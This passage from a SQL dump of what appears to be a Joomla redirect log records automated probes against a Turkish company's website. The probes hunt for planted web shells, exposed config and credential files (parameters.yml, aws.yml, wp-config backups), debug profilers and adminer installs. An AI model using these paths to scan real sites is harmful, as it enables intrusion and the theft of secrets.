00:00:00',301),(50680,'http://3s-technologies.com.tr/tr/lvcbezwasgq.php',NULL,'','',2,0,'2025-12-16 07:41:30','0000-00-00 00:00:00',301),(50681,'http://3s-technologies.com.tr/tr/kv7egjmhhzx.php',NULL,'','',2,0,'2025-12-16 07:41:33','0000-00-00 00:00:00',301),(50682,'http://3s-technologies.com.tr/tr/ijndpi1orya.php',NULL,'','',2,0,'2025-12-16 07:41:34','0000-00-00 00:00:00',301),(50683,'http://3s-technologies.com.tr/tr/hpum4zebjrc.php',NULL,'','',2,0,'2025-12-16 07:41:35','0000-00-00 00:00:00',301),(50684,'http://3s-technologies.com.tr/tr/agetbfjb5zu.php',NULL,'','',2,0,'2025-12-16 07:41:43','0000-00-00 00:00:00',301),(50685,'http://3s-technologies.com.tr/tr/bmjxqkgwpeb.php',NULL,'','',2,0,'2025-12-16 07:41:44','0000-00-00 00:00:00',301),(50686,'http://3s-technologies.com.tr/tr/fscmnvnjpx4.php',NULL,'','',2,0,'2025-12-16 07:41:44','0000-00-00 00:00:00',301),(50687,'http://3s-technologies.com.tr/tr/start.php',NULL,'','',2,0,'2025-12-16 21:38:40','0000-00-00 00:00:00',301),(50688,'http://3s-technologies.com.tr/tr/akeeba-backup.php',NULL,'','',1,0,'2025-12-17 00:05:29','0000-00-00 00:00:00',301),(50689,'http://3s-technologies.com.tr/tr/ah22.php',NULL,'','',4,0,'2025-12-17 00:23:32','0000-00-00 00:00:00',301),(50690,'http://3s-technologies.com.tr/tr/wp-includes/assets/zxl.php',NULL,'','',3,0,'2025-12-17 00:23:36','0000-00-00 00:00:00',301),(50691,'http://3s-technologies.com.tr/tr/css/sf9.php',NULL,'','',3,0,'2025-12-17 00:23:37','0000-00-00 00:00:00',301),(50692,'http://3s-technologies.com.tr/tr/npcs7k.php',NULL,'','',3,0,'2025-12-17 00:23:43','0000-00-00 00:00:00',301),(50693,'http://3s-technologies.com.tr/tr/cro.php',NULL,'','',6,0,'2025-12-17 00:23:45','0000-00-00 00:00:00',301),(50694,'http://3s-technologies.com.tr/tr/egu.php',NULL,'','',3,0,'2025-12-17 00:23:46','0000-00-00 00:00:00',301),(50695,'http://3s-technologies.com.tr/tr/doo.php',NULL,'','',6,0,'2025-12-17 00:23:47','0000-00-00 00:00:00',301),(50696,'http://3s-technologies.com.tr/tr/wakak.php',NULL,'','',12,0,'2025-12-17 00:23:49','0000-00-00 00:00:00',301),(50697,'http://3s-technologies.com.tr/tr/wsvvs.php',NULL,'','',31,0,'2025-12-17 00:24:50','0000-00-00 00:00:00',301),(50698,'http://3s-technologies.com.tr/tr/qlex1.php',NULL,'','',3,0,'2025-12-17 00:24:59','0000-00-00 00:00:00',301),(50699,'https://3s-technologies.com.tr/tr/_profiler/open?file=app/config/parameters.yml',NULL,'','',2,0,'2025-12-17 14:12:15','0000-00-00 00:00:00',301),(50700,'https://3s-technologies.com.tr/tr/debug/default/open?file=app/config/parameters.yml',NULL,'','',1,0,'2025-12-17 14:12:16','0000-00-00 00:00:00',301),(50701,'https://3s-technologies.com.tr/tr/app/config/parameters.yml',NULL,'','',1,0,'2025-12-17 14:12:17','0000-00-00 00:00:00',301),(50702,'https://3s-technologies.com.tr/tr/app/config.yml',NULL,'','',1,0,'2025-12-17 14:12:17','0000-00-00 00:00:00',301),(50703,'https://3s-technologies.com.tr/tr/tool/view/phpinfo.view.php',NULL,'','',2,0,'2025-12-17 14:12:18','0000-00-00 00:00:00',301),(50704,'https://3s-technologies.com.tr/tr/debug/default/view.html',NULL,'','',1,0,'2025-12-17 14:12:18','0000-00-00 00:00:00',301),(50705,'https://3s-technologies.com.tr/tr/frontend/web/debug/default/view',NULL,'','',1,0,'2025-12-17 14:12:19','0000-00-00 00:00:00',301),(50706,'https://3s-technologies.com.tr/tr/web/debug/default/view',NULL,'','',1,0,'2025-12-17 14:12:19','0000-00-00 00:00:00',301),(50707,'https://3s-technologies.com.tr/tr/config/aws.yml',NULL,'','',2,0,'2025-12-17 14:12:20','0000-00-00 00:00:00',301),(50708,'https://3s-technologies.com.tr/tr/symfony/public/_profiler/phpinfo',NULL,'','',1,0,'2025-12-17 14:12:21','0000-00-00 00:00:00',301),(50709,'https://3s-technologies.com.tr/tr/symfony/public/_profiler/open?file=app/config/parameters.yml',NULL,'','',1,0,'2025-12-17 14:12:21','0000-00-00 00:00:00',301),(50710,'https://3s-technologies.com.tr/tr/index_dev.php',NULL,'','',1,0,'2025-12-17 14:12:22','0000-00-00 00:00:00',301),(50711,'https://3s-technologies.com.tr/tr/wp-config.php-backup',NULL,'','',1,0,'2025-12-17 14:12:23','0000-00-00 00:00:00',301),(50712,'https://3s-technologies.com.tr/tr/debug/default/view',NULL,'','',4,0,'2025-12-17 14:12:23','0000-00-00 00:00:00',301),(50713,'https://3s-technologies.com.tr/tr/sapi/debug/default/view',NULL,'','',1,0,'2025-12-17 14:12:24','0000-00-00 00:00:00',301),(50714,'https://3s-technologies.com.tr/tr/aws.yml',NULL,'','',1,0,'2025-12-17 14:12:26','0000-00-00 00:00:00',301),(50715,'https://3s-technologies.com.tr/tr/symfony/public',NULL,'','',1,0,'2025-12-17 14:12:29','0000-00-00 00:00:00',301),(50716,'http://3s-technologies.com.tr/tr/.tresh/index.php',NULL,'','',5,0,'2025-12-17 17:45:51','0000-00-00 00:00:00',301),(50717,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/content.php',NULL,'','',1,0,'2025-12-17 17:45:59','0000-00-00 00:00:00',301),(50718,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/class-wp-type-registroy.php',NULL,'','',1,0,'2025-12-17 17:46:03','0000-00-00 00:00:00',301),(50719,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/class.api.php',NULL,'','',1,0,'2025-12-17 17:46:04','0000-00-00 00:00:00',301),(50720,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/cong.php',NULL,'','',1,0,'2025-12-17 17:46:07','0000-00-00 00:00:00',301),(50721,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/hasna.php',NULL,'','',1,0,'2025-12-17 17:46:08','0000-00-00 00:00:00',301),(50722,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/init-widgets-sitemaps.php',NULL,'','',1,0,'2025-12-17 17:46:10','0000-00-00 00:00:00',301),(50723,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/oesmsspq.php',NULL,'','',1,0,'2025-12-17 17:46:12','0000-00-00 00:00:00',301),(50724,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/setting.php',NULL,'','',1,0,'2025-12-17 17:46:13','0000-00-00 00:00:00',301),(50725,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-load.php',NULL,'','',1,0,'2025-12-17 17:46:15','0000-00-00 00:00:00',301),(50726,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/xa.php',NULL,'','',1,0,'2025-12-17 17:46:16','0000-00-00 00:00:00',301),(50727,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/xml_domit_parser.php',NULL,'','',1,0,'2025-12-17 17:46:17','0000-00-00 00:00:00',301),(50728,'http://3s-technologies.com.tr/tr/.well-known/alfacgiapi/getdir.alfa',NULL,'','',5,0,'2025-12-17 17:46:19','0000-00-00 00:00:00',301),(50729,'http://3s-technologies.com.tr/tr/.well-known/chris.php',NULL,'','',2,0,'2025-12-17 17:46:21','0000-00-00 00:00:00',301),(50730,'http://3s-technologies.com.tr/tr/.well-known/chtmlfuns.php',NULL,'','',1,0,'2025-12-17 17:46:22','0000-00-00 00:00:00',301),(50731,'http://3s-technologies.com.tr/tr/.well-known/class-wp-type-registroy.php',NULL,'','',1,0,'2025-12-17 17:46:23','0000-00-00 00:00:00',301),(50732,'http://3s-technologies.com.tr/tr/.well-known/default_folders.php',NULL,'','',1,0,'2025-12-17 17:46:24','0000-00-00 00:00:00',301),(50733,'http://3s-technologies.com.tr/tr/.well-known/dormunt.php',NULL,'','',1,0,'2025-12-17 17:46:24','0000-00-00 00:00:00',301),(50734,'http://3s-technologies.com.tr/tr/.well-known/error.php',NULL,'','',5,0,'2025-12-17 17:46:25','0000-00-00 00:00:00',301),(50735,'http://3s-technologies.com.tr/tr/.well-known/lufix.php',NULL,'','',1,0,'2025-12-17 17:46:31','0000-00-00 00:00:00',301),(50736,'http://3s-technologies.com.tr/tr/.well-known/marsvf.php',NULL,'','',1,0,'2025-12-17 17:46:32','0000-00-00 00:00:00',301),(50737,'http://3s-technologies.com.tr/tr/.well-known/metrol.php',NULL,'','',1,0,'2025-12-17 17:46:33','0000-00-00 00:00:00',301),(50738,'http://3s-technologies.com.tr/tr/.well-known/notice.php',NULL,'','',1,0,'2025-12-17 17:46:34','0000-00-00 00:00:00',301),(50739,'http://3s-technologies.com.tr/tr/.well-known/oc.php',NULL,'','',1,0,'2025-12-17 17:46:34','0000-00-00 00:00:00',301),(50740,'http://3s-technologies.com.tr/tr/.well-known/pki.php',NULL,'','',1,0,'2025-12-17 17:46:46','0000-00-00 00:00:00',301),(50741,'http://3s-technologies.com.tr/tr/.well-known/scrfmbnu.php',NULL,'','',1,0,'2025-12-17 17:46:47','0000-00-00 00:00:00',301),(50742,'http://3s-technologies.com.tr/tr/.well-known/seosorgula.com.php',NULL,'','',1,0,'2025-12-17 17:46:48','0000-00-00 00:00:00',301),(50743,'http://3s-technologies.com.tr/tr/.well-known/server.php',NULL,'','',1,0,'2025-12-17 17:46:49','0000-00-00 00:00:00',301),(50744,'http://3s-technologies.com.tr/tr/.well-known/shxrrldh.php',NULL,'','',1,0,'2025-12-17 17:46:50','0000-00-00 00:00:00',301),(50745,'http://3s-technologies.com.tr/tr/.well-known/subirfoto.php',NULL,'','',1,0,'2025-12-17 17:46:51','0000-00-00 00:00:00',301),(50746,'http://3s-technologies.com.tr/tr/.well-known/ubet.php',NULL,'','',1,0,'2025-12-17 17:46:52','0000-00-00 00:00:00',301),(50747,'http://3s-technologies.com.tr/tr/.well-known/wp-admn.php',NULL,'','',1,0,'2025-12-17 17:46:53','0000-00-00 00:00:00',301),(50748,'http://3s-technologies.com.tr/tr/.well-known/zhborlja.php',NULL,'','',1,0,'2025-12-17 17:46:54','0000-00-00 00:00:00',301),(50749,'http://3s-technologies.com.tr/tr/fonts/img.php',NULL,'','',1,0,'2025-12-17 17:47:07','0000-00-00 00:00:00',301),(50750,'http://3s-technologies.com.tr/tr/wp-content/plugins/char/lock360.php',NULL,'','',1,0,'2025-12-17 17:47:24','0000-00-00 00:00:00',301),(50751,'http://3s-technologies.com.tr/tr/about/function.php/radio.php',NULL,'','',1,0,'2025-12-17 17:47:49','0000-00-00 00:00:00',301),(50752,'http://3s-technologies.com.tr/tr/admin-functions.php',NULL,'','',1,0,'2025-12-17 17:47:51','0000-00-00 00:00:00',301),(50753,'http://3s-technologies.com.tr/tr/admin.php/uploads',NULL,'','',1,0,'2025-12-17 17:47:54','0000-00-00 00:00:00',301),(50754,'http://3s-technologies.com.tr/tr/admin/blogupload/wp-ver.php',NULL,'','',1,0,'2025-12-17 17:47:58','0000-00-00 00:00:00',301),(50755,'http://3s-technologies.com.tr/tr/admin/image/105921cccccc.php',NULL,'','',1,0,'2025-12-17 17:48:03','0000-00-00 00:00:00',301),(50756,'http://3s-technologies.com.tr/tr/admin/tmp',NULL,'','',1,0,'2025-12-17 17:48:06','0000-00-00 00:00:00',301),(50757,'http://3s-technologies.com.tr/tr/aeckwuws.php',NULL,'','',1,0,'2025-12-17 17:48:12','0000-00-00 00:00:00',301),(50758,'http://3s-technologies.com.tr/tr/assets/images/doc.php/.well-known/index.php',NULL,'','',1,0,'2025-12-17 17:48:39','0000-00-00 00:00:00',301),(50759,'http://3s-technologies.com.tr/tr/assets/plugins/fancybox/mainhack.php',NULL,'','',1,0,'2025-12-17 17:48:41','0000-00-00 00:00:00',301),(50760,'http://3s-technologies.com.tr/tr/async-upload.php',NULL,'','',5,0,'2025-12-17 17:48:41','0000-00-00 00:00:00',301),(50761,'http://3s-technologies.com.tr/tr/backoffice/portraits/index.php',NULL,'','',1,0,'2025-12-17 17:48:45','0000-00-00 00:00:00',301),(50762,'http://3s-technologies.com.tr/tr/bengi.php',NULL,'','',37,0,'2025-12-17 17:48:49','0000-00-00 00:00:00',301),(50763,'http://3s-technologies.com.tr/tr/blog/moo.php',NULL,'','',1,0,'2025-12-17 17:48:54','0000-00-00 00:00:00',301),(50764,'http://3s-technologies.com.tr/tr/blog/wp-content/plugins/prenota/alpha.php',NULL,'','',1,0,'2025-12-17 17:48:55','0000-00-00 00:00:00',301),(50765,'http://3s-technologies.com.tr/tr/connects.php',NULL,'','',1,0,'2025-12-17 17:49:05','0000-00-00 00:00:00',301),(50766,'http://3s-technologies.com.tr/tr/ctveaklx.php',NULL,'','',1,0,'2025-12-17 17:49:14','0000-00-00 00:00:00',301),(50767,'http://3s-technologies.com.tr/tr/gecko.php/.well-known/index.php',NULL,'','',1,0,'2025-12-17 17:49:28','0000-00-00 00:00:00',301),(50768,'http://3s-technologies.com.tr/tr/hilk.php',NULL,'','',6,0,'2025-12-17 17:49:32','0000-00-00 00:00:00',301),(50769,'http://3s-technologies.com.tr/tr/images/xleet.php',NULL,'','',1,0,'2025-12-17 17:49:33','0000-00-00 00:00:00',301),(50770,'http://3s-technologies.com.tr/tr/images/atomlib.php',NULL,'','',1,0,'2025-12-17 17:49:36','0000-00-00 00:00:00',301),(50771,'http://3s-technologies.com.tr/tr/images/contato.php',NULL,'','',1,0,'2025-12-17 17:49:39','0000-00-00 00:00:00',301),(50772,'http://3s-technologies.com.tr/tr/images/css.php',NULL,'','',1,0,'2025-12-17 17:49:40','0000-00-00 00:00:00',301),(50773,'http://3s-technologies.com.tr/tr/images/install.php',NULL,'','',2,0,'2025-12-17 17:49:43','0000-00-00 00:00:00',301),(50774,'http://3s-technologies.com.tr/tr/images/nxc.php',NULL,'','',1,0,'2025-12-17 17:49:45','0000-00-00 00:00:00',301),(50775,'http://3s-technologies.com.tr/tr/images/profiles/cyber.jpg.php',NULL,'','',1,0,'2025-12-17 17:49:47','0000-00-00 00:00:00',301),(50776,'http://3s-technologies.com.tr/tr/images/thumb.php',NULL,'','',2,0,'2025-12-17 17:49:50','0000-00-00 00:00:00',301),(50777,'http://3s-technologies.com.tr/tr/img/nxc.php',NULL,'','',1,0,'2025-12-17 17:49:51','0000-00-00 00:00:00',301),(50778,'http://3s-technologies.com.tr/tr/index3.php',NULL,'','',1,0,'2025-12-17 17:49:59','0000-00-00 00:00:00',301),(50779,'http://3s-technologies.com.tr/tr/index_bak.php',NULL,'','',1,0,'2025-12-17 17:50:00','0000-00-00 00:00:00',301),(50780,'http://3s-technologies.com.tr/tr/tlvs8pou.php',NULL,'','',1,0,'2025-12-17 17:50:18','0000-00-00 00:00:00',301),(50781,'http://3s-technologies.com.tr/tr/update/gely.php',NULL,'','',6,0,'2025-12-17 17:50:22','0000-00-00 00:00:00',301),(50782,'http://3s-technologies.com.tr/tr/upload/gpt-sh2.php',NULL,'','',1,0,'2025-12-17 17:50:25','0000-00-00 00:00:00',301),(50783,'http://3s-technologies.com.tr/tr/uploads/file_upload.php',NULL,'','',1,0,'2025-12-17 17:50:30','0000-00-00 00:00:00',301),(50784,'http://3s-technologies.com.tr/tr/uploads/slot-gacor-uang-asli.php',NULL,'','',1,0,'2025-12-17 17:50:32','0000-00-00 00:00:00',301),(50785,'https://3s-technologies.com.tr/tr/api/actuator',NULL,'https://3s-technologies.com.tr/api/actuator','',3,0,'2025-12-17 19:07:41','0000-00-00 00:00:00',301),(50786,'https://3s-technologies.com.tr/en/dalga-lehimleme',NULL,'','',3,0,'2025-12-18 14:02:46','0000-00-00 00:00:00',301),(50787,'https://3s-technologies.com.tr/en/ürünler/bölgesel-lehimleme',NULL,'','',1,0,'2025-12-18 14:02:46','0000-00-00 00:00:00',301),(50788,'https://3s-technologies.com.tr/en/kursunsuz-lehim',NULL,'','',3,0,'2025-12-18 14:02:46','0000-00-00 00:00:00',301),(50789,'https://3s-technologies.com.tr/en/kart-ueretim-teknolojileri',NULL,'','',3,0,'2025-12-18 14:02:46','0000-00-00 00:00:00',301),(50790,'https://3s-technologies.com.tr/en/80-turkish-tr/turkish-content/82-baslang-c-smd-hatlar',NULL,'','',3,0,'2025-12-18 14:02:46','0000-00-00 00:00:00',301),(50791,'https://3s-technologies.com.tr/en/iletisim',NULL,'','',1,0,'2025-12-18 14:02:57','0000-00-00 00:00:00',301),(50792,'https://3s-technologies.com.tr/en/ana-sayfa',NULL,'','',4,0,'2025-12-18 14:03:16','0000-00-00 00:00:00',301),(50793,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/en/products-2/led-floresan/t8-led-floresan',NULL,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/en/products-2/led-floresan/t8-led-floresan','',3,0,'2025-12-18 15:28:12','0000-00-00 00:00:00',301),(50794,'http://3s-technologies.com.tr/tr/panelx.php',NULL,'','',2,0,'2025-12-19 12:11:58','0000-00-00 00:00:00',301),(50795,'http://3s-technologies.com.tr/tr/bekle.php',NULL,'','',2,0,'2025-12-19 12:12:00','0000-00-00 00:00:00',301),(50796,'http://3s-technologies.com.tr/tr/auths.php',NULL,'','',2,0,'2025-12-19 12:12:01','0000-00-00 00:00:00',301),(50797,'http://3s-technologies.com.tr/tr/rasp.php',NULL,'','',1,0,'2025-12-19 12:12:02','0000-00-00 00:00:00',301),(50798,'http://3s-technologies.com.tr/tr/_inc-rasberry0342.php',NULL,'','',1,0,'2025-12-19 12:12:03','0000-00-00 00:00:00',301),(50799,'http://3s-technologies.com.tr/tr/testphp.php',NULL,'','',2,0,'2025-12-19 12:12:13','0000-00-00 00:00:00',301),(50800,'http://3s-technologies.com.tr/tr/tempfs.php',NULL,'','',1,0,'2025-12-19 12:12:16','0000-00-00 00:00:00',301),(50801,'http://3s-technologies.com.tr/tr/joomla_hashes.php',NULL,'','',1,0,'2025-12-19 12:12:19','0000-00-00 00:00:00',301),(50802,'http://3s-technologies.com.tr/tr/mage.php',NULL,'','',1,0,'2025-12-19 12:12:23','0000-00-00 00:00:00',301),(50803,'http://3s-technologies.com.tr/tr/newsletter_signup.php',NULL,'','',1,0,'2025-12-19 12:12:27','0000-00-00 00:00:00',301),(50804,'http://3s-technologies.com.tr/tr/index-2.php',NULL,'','',1,0,'2025-12-19 12:12:28','0000-00-00 00:00:00',301),(50805,'http://3s-technologies.com.tr/tr/personal.php',NULL,'','',1,0,'2025-12-19 12:12:30','0000-00-00 00:00:00',301),(50806,'http://3s-technologies.com.tr/tr/mob.php',NULL,'','',2,0,'2025-12-19 12:12:32','0000-00-00 00:00:00',301),(50807,'http://3s-technologies.com.tr/tr/shippings.php',NULL,'','',1,0,'2025-12-19 12:12:33','0000-00-00 00:00:00',301),(50808,'http://3s-technologies.com.tr/tr/adminer-4.6.6.php',NULL,'','',1,0,'2025-12-19 12:12:35','0000-00-00 00:00:00',301),(50809,'http://3s-technologies.com.tr/tr/adminer-4.6.5.php',NULL,'','',1,0,'2025-12-19 12:12:37','0000-00-00 00:00:00',301),(50810,'http://3s-technologies.com.tr/tr/adminer-4.6.4.php',NULL,'','',1,0,'2025-12-19 12:12:38','0000-00-00 00:00:00',301),(50811,'http://3s-technologies.com.tr/tr/logout.php',NULL,'','',2,0,'2025-12-19 12:12:39','0000-00-00 00:00:00',301),(50812,'http://3s-technologies.com.tr/tr/signin.php',NULL,'','',1,0,'2025-12-19 12:12:40','0000-00-00 00:00:00',301),(50813,'http://3s-technologies.com.tr/tr/vbv.php',NULL,'','',3,0,'2025-12-19 12:12:42','0000-00-00 00:00:00',301),(50814,'http://3s-technologies.com.tr/tr/adminer-4.7.0.php',NULL,'','',1,0,'2025-12-19 12:12:43','0000-00-00 00:00:00',301),(50815,'http://3s-technologies.com.tr/tr/loginfailed.php',NULL,'','',1,0,'2025-12-19 12:12:44','0000-00-00 00:00:00',301),(50816,'http://3s-technologies.com.tr/tr/logins.php',NULL,'','',1,0,'2025-12-19 12:12:45','0000-00-00 00:00:00',301),(50817,'http://3s-technologies.com.tr/tr/pac.php',NULL,'','',2,0,'2025-12-19 12:12:46','0000-00-00 00:00:00',301),(50818,'http://3s-technologies.com.tr/tr/adminer-4.7.1.php',NULL,'','',1,0,'2025-12-19 12:12:48','0000-00-00 00:00:00',301),(50819,'http://3s-technologies.com.tr/tr/adminer-4.7.2.php',NULL,'','',1,0,'2025-12-19 12:12:49','0000-00-00 00:00:00',301),(50820,'http://3s-technologies.com.tr/tr/adminer-4.7.3.php',NULL,'','',1,0,'2025-12-19 12:12:50','0000-00-00 00:00:00',301),(50821,'http://3s-technologies.com.tr/tr/adminer-4.7.4.php',NULL,'','',1,0,'2025-12-19 12:12:51','0000-00-00 00:00:00',301),(50822,'http://3s-technologies.com.tr/tr/adminer-4.7.5.php',NULL,'','',1,0,'2025-12-19 12:12:52','0000-00-00 00:00:00',301),(50823,'http://3s-technologies.com.tr/tr/adminer-4.7.6.php',NULL,'','',1,0,'2025-12-19 12:12:54','0000-00-00 00:00:00',301),(50824,'http://3s-technologies.com.tr/tr/adminer-4.2.3-en.php',NULL,'','',2,0,'2025-12-19 12:12:55','0000-00-00 00:00:00',301),(50825,'http://3s-technologies.com.tr/tr/xtride.php',NULL,'','',8,0,'2025-12-19 13:05:19','0000-00-00 00:00:00',301),(50826,'http://3s-technologies.com.tr/tr/ws29.php',NULL,'','',8,0,'2025-12-19 13:05:20','0000-00-00 00:00:00',301),(50827,'http://3s-technologies.com.tr/tr/s11.php',NULL,'','',7,0,'2025-12-19 13:05:21','0000-00-00 00:00:00',301),(50828,'http://3s-technologies.com.tr/tr/dkub.php',NULL,'','',1,0,'2025-12-19 13:05:23','0000-00-00 00:00:00',301),(50829,'http://3s-technologies.com.tr/tr/x100.php',NULL,'','',1,0,'2025-12-19 13:05:24','0000-00-00 00:00:00',301),(50830,'http://3s-technologies.com.tr/tr/aqw.php',NULL,'','',8,0,'2025-12-19 13:05:25','0000-00-00 00:00:00',301),(50831,'http://3s-technologies.com.tr/tr/ca1.php',NULL,'','',6,0,'2025-12-19 13:05:26','0000-00-00 00:00:00',301),(50832,'http://3s-technologies.com.tr/tr/abouta.php',NULL,'','',9,0,'2025-12-19 13:05:27','0000-00-00 00:00:00',301),(50833,'http://3s-technologies.com.tr/tr/fclas.php',NULL,'','',6,0,'2025-12-19 13:05:28','0000-00-00 00:00:00',301),(50834,'http://3s-technologies.com.tr/tr/all.php',NULL,'','',6,0,'2025-12-19 13:05:29','0000-00-00 00:00:00',301),(50835,'http://3s-technologies.com.tr/tr/bbn.php',NULL,'','',13,0,'2025-12-19 13:05:30','0000-00-00 00:00:00',301),(50836,'http://3s-technologies.com.tr/tr/class-t.api2.php',NULL,'','',1,0,'2025-12-19 13:05:33','0000-00-00 00:00:00',301),(50837,'http://3s-technologies.com.tr/tr/xz89.php',NULL,'','',7,0,'2025-12-19 13:05:34','0000-00-00 00:00:00',301),(50838,'http://3s-technologies.com.tr/tr/wft.php',NULL,'','',7,0,'2025-12-19 13:05:37','0000-00-00 00:00:00',301),(50839,'http://3s-technologies.com.tr/tr/ws28.php',NULL,'','',11,0,'2025-12-19 13:05:37','0000-00-00 00:00:00',301),(50840,'http://3s-technologies.com.tr/tr/wsheet1.php',NULL,'','',7,0,'2025-12-19 13:05:38','0000-00-00 00:00:00',301),(50841,'http://3s-technologies.com.tr/tr/waq.php',NULL,'','',9,0,'2025-12-19 13:07:40','0000-00-00 00:00:00',301),(50842,'http://3s-technologies.com.tr/tr/wen.php',NULL,'','',88,0,'2025-12-19 13:07:44','0000-00-00 00:00:00',301),(50843,'http://3s-technologies.com.tr/tr/cwclass.php',NULL,'','',22,0,'2025-12-19 13:07:45','0000-00-00 00:00:00',301),(50844,'http://3s-technologies.com.tr/tr/ah24.php',NULL,'','',6,0,'2025-12-19 13:07:46','0000-00-00 00:00:00',301),(50845,'http://3s-technologies.com.tr/tr/rtx.php',NULL,'','',26,0,'2025-12-19 13:07:47','0000-00-00 00:00:00',301),(50846,'http://3s-technologies.com.tr/tr/bipas.php',NULL,'','',12,0,'2025-12-19 13:07:47','0000-00-00 00:00:00',301),(50847,'http://3s-technologies.com.tr/tr/conte.php',NULL,'','',8,0,'2025-12-19 13:07:48','0000-00-00 00:00:00',301),(50848,'http://3s-technologies.com.tr/tr/class3.php',NULL,'','',7,0,'2025-12-19 13:07:49','0000-00-00 00:00:00',301),(50849,'http://3s-technologies.com.tr/tr/little.php',NULL,'','',1,0,'2025-12-19 13:07:51','0000-00-00 00:00:00',301),(50850,'http://3s-technologies.com.tr/tr/css/up.php',NULL,'','',1,0,'2025-12-19 15:58:56','0000-00-00 00:00:00',301),(50851,'http://3s-technologies.com.tr/tr/static/as.php',NULL,'','',1,0,'2025-12-19 16:00:06','0000-00-00 00:00:00',301),(50852,'http://3s-technologies.com.tr/tr/zxz.php',NULL,'','',1,0,'2025-12-19 16:01:25','0000-00-00 00:00:00',301),(50853,'http://3s-technologies.com.tr/tr/lufix1.php',NULL,'http://3s-technologies.com.tr/lufix1.php#lufix','',11,0,'2025-12-19 20:57:27','0000-00-00 00:00:00',301),(50854,'http://3s-technologies.com.tr/tr/txets.php',NULL,'http://3s-technologies.com.tr/txets.php','',91,0,'2025-12-19 20:57:50','0000-00-00 00:00:00',301),(50855,'http://3s-technologies.com.tr/tr/wp-content/txets.php',NULL,'http://3s-technologies.com.tr/wp-content/txets.php','',29,0,'2025-12-19 20:57:52','0000-00-00 00:00:00',301),(50856,'http://3s-technologies.com.tr/tr/wp-admin/txets.php',NULL,'http://3s-technologies.com.tr/wp-admin/txets.php','',28,0,'2025-12-19 20:57:54','0000-00-00 00:00:00',301),(50857,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/chosen.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:32','0000-00-00 00:00:00',301),(50858,'http://3s-technologies.com.tr/en/wp-apxupx.php?apx=upx',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:36:33','0000-00-00 00:00:00',301),(50859,'http://3s-technologies.com.tr/en/wp-admin/images/function.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:36:37','0000-00-00 00:00:00',301),(50860,'http://3s-technologies.com.tr/en/wp-admin/includes/function.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:36:38','0000-00-00 00:00:00',301),(50861,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/function.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:36:39','0000-00-00 00:00:00',301),(50862,'http://3s-technologies.com.tr/en/wp-admin/js/function.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:36:40','0000-00-00 00:00:00',301),(50863,'http://3s-technologies.com.tr/en/wp-admin/maint/function.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:41','0000-00-00 00:00:00',301),(50864,'http://3s-technologies.com.tr/en/wp-admin/network/function.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:36:42','0000-00-00 00:00:00',301),(50865,'http://3s-technologies.com.tr/en/wp-admin/user/function.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:36:43','0000-00-00 00:00:00',301),(50866,'http://3s-technologies.com.tr/en/wp-content/function.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:44','0000-00-00 00:00:00',301),(50867,'http://3s-technologies.com.tr/en/wp-content/uploads/function.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:36:44','0000-00-00 00:00:00',301),(50868,'http://3s-technologies.com.tr/en/wp-content/plugins/function.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:36:45','0000-00-00 00:00:00',301),(50869,'http://3s-technologies.com.tr/en/wp-content/languages/function.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:36:46','0000-00-00 00:00:00',301),(50870,'http://3s-technologies.com.tr/en/wp-content/languages/themes/function.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:36:47','0000-00-00 00:00:00',301),(50871,'http://3s-technologies.com.tr/en/wp-includes/simplepie/function.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:36:48','0000-00-00 00:00:00',301),(50872,'http://3s-technologies.com.tr/en/wp-includes/certificates/function.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:36:49','0000-00-00 00:00:00',301),(50873,'http://3s-technologies.com.tr/en/wp-includes/customize/function.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:50','0000-00-00 00:00:00',301),(50874,'http://3s-technologies.com.tr/en/as/function.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:53','0000-00-00 00:00:00',301),(50875,'http://3s-technologies.com.tr/en/chosen/function.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:36:55','0000-00-00 00:00:00',301),(50876,'http://3s-technologies.com.tr/en/doc/function.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:36:55','0000-00-00 00:00:00',301),(50877,'http://3s-technologies.com.tr/en/plugins/function.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:36:59','0000-00-00 00:00:00',301),(50878,'http://3s-technologies.com.tr/en/wp-admin/images/chosen.php',NULL,'https://www.google.com/','',8,0,'2025-12-20 04:37:01','0000-00-00 00:00:00',301),(50879,'http://3s-technologies.com.tr/en/wp-admin/includes/chosen.php',NULL,'https://www.google.co.uk/','',24,0,'2025-12-20 04:37:02','0000-00-00 00:00:00',301),(50880,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/chosen.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:37:03','0000-00-00 